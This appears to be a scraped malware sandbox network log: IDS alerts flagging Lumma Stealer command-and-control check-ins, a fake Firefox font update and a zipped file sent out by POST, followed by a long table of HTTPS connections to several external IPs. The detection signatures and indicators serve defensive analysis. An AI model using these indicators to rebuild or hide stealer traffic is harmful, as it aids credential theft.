                                                                                                                                                                                                                                    2024-12-18T09:52:44.116781+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549905172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:48.083642+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549915172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:51.363600+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549922172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:54.488685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549932172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:54.496050+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549932172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:59.111699+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549943172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:59.855849+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549943172.67.157.254443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 09:52:25.571400881 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:25.571500063 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:25.577416897 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:25.578507900 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:25.578546047 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:27.405767918 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:27.405886889 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:27.407210112 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:27.407239914 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:27.407591105 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:27.456346989 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:27.456409931 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:27.456501007 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:28.314632893 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:28.314735889 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:28.314820051 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:28.315787077 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:28.315836906 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:28.315866947 CET | 49858 | 443 | 192.168.2.5 | 45.77.249.79
Dec 18, 2024 09:52:28.315882921 CET | 443 | 49858 | 45.77.249.79 | 192.168.2.5
Dec 18, 2024 09:52:29.766948938 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:29.767043114 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:29.767132998 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:29.767527103 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:29.767560959 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.001991987 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.002104044 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:31.004056931 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:31.004077911 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.004494905 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.005565882 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:31.005609989 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:31.005676031 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.418703079 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.418895960 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.418999910 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:31.419092894 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:31.419132948 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:31.419176102 CET | 49869 | 443 | 192.168.2.5 | 104.131.68.180
Dec 18, 2024 09:52:31.419190884 CET | 443 | 49869 | 104.131.68.180 | 192.168.2.5
Dec 18, 2024 09:52:33.287966013 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:33.288026094 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:33.288093090 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:33.288395882 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:33.288444996 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:34.686058044 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:34.686183929 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:34.687685013 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:34.687706947 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:34.688117981 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:34.689285994 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:34.731359005 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.623876095 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.623939037 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.623969078 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.623981953 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.624027014 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.624063015 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.624063015 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.624092102 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.807091951 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.807183981 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.807224035 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.807254076 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.807394028 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.837446928 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.837500095 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.837543011 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.837559938 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.837609053 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.837632895 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.837687016 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.838330030 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.838330030 CET | 49879 | 443 | 192.168.2.5 | 23.55.153.106
Dec 18, 2024 09:52:35.838363886 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:35.838392019 CET | 443 | 49879 | 23.55.153.106 | 192.168.2.5
Dec 18, 2024 09:52:36.152328968 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:36.152360916 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:36.152442932 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:36.152720928 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:36.152733088 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:37.376281023 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:37.376405001 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:37.377782106 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:37.377788067 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:37.378273964 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:37.379432917 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:37.379450083 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:37.379515886 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:38.082796097 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:38.083060980 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:38.083117962 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:38.088246107 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:38.088258028 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:38.088268042 CET | 49886 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:38.088273048 CET | 443 | 49886 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:38.237624884 CET | 49892 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:38.237670898 CET | 443 | 49892 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:38.237734079 CET | 49892 | 443 | 192.168.2.5 | 172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.238006115 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.238022089 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.453787088 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.453861952 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.454879045 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.454885960 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.455946922 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.456957102 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.456971884 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.457119942 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496213913 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496347904 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496413946 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496433020 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496463060 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496649027 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496727943 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496731997 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496757030 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496788979 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.501876116 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.501952887 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.501975060 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.510288954 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.510349989 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.510360003 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.554651976 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.554662943 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.601511955 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.616103888 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.657480001 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687030077 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687194109 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687243938 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687254906 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690836906 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690888882 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690896034 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690996885 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691014051 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691014051 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691040039 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691055059 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691061974 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867337942 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867373943 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867441893 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867676973 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867691040 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.080538034 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.080645084 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.081726074 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.081757069 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.082099915 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.083146095 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.083334923 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.083384991 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809397936 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809655905 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809665918 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809729099 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903053045 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903086901 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903158903 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903374910 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903390884 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.116682053 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.116780996 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.122091055 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.122109890 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.122607946 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.123806000 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.123918056 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.123950005 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.124000072 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.167359114 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600436926 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600666046 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600740910 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600965023 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600992918 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871339083 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871429920 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871541977 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871814966 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871850967 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.083441019 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.083642006 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.085151911 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.085164070 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.085483074 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086608887 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086777925 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086813927 CET44349915172.67.157.254192.168.2.5
Dec 18, 2024 09:52:48.086909056 CET | 49915 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:48.086918116 CET | 443 | 49915 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:49.829741001 CET | 443 | 49915 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:49.829901934 CET | 443 | 49915 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:49.829993963 CET | 49915 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:49.830117941 CET | 49915 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:49.830157042 CET | 443 | 49915 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:50.155078888 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:50.155170918 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:50.155267954 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:50.155905962 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:50.155944109 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:51.363493919 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:51.363600016 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:51.365372896 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:51.365403891 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:51.365840912 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:51.367216110 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:51.367285013 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:51.367300987 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:52.899408102 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:52.899506092 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:52.899672031 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:52.899749994 CET | 49922 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:52.899801016 CET | 443 | 49922 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:53.282990932 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:53.283055067 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:53.283243895 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:53.283430099 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:53.283463955 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.488568068 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.488684893 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.489768982 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.489800930 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.490148067 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.494441986 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.495090008 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.495157003 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.495291948 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.495340109 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.495873928 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.495938063 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.496958971 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.497009993 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.497227907 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.497286081 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.497555017 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.497621059 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.497641087 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.497656107 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.497894049 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.497941971 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.497991085 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.498811960 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.498862982 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.543363094 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.545711040 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.545779943 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.545861006 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.545883894 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.545926094 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.545949936 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:54.545978069 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:54.545991898 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:57.870899916 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:57.871126890 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:57.871145010 CET | 443 | 49932 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:57.871206045 CET | 49932 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:57.896272898 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:57.896326065 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:57.896426916 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:57.896651983 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:57.896681070 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:59.111591101 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:59.111699104 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:59.112771034 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:59.112808943 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:59.113219976 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:59.114367008 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:59.114413977 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:59.114473104 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
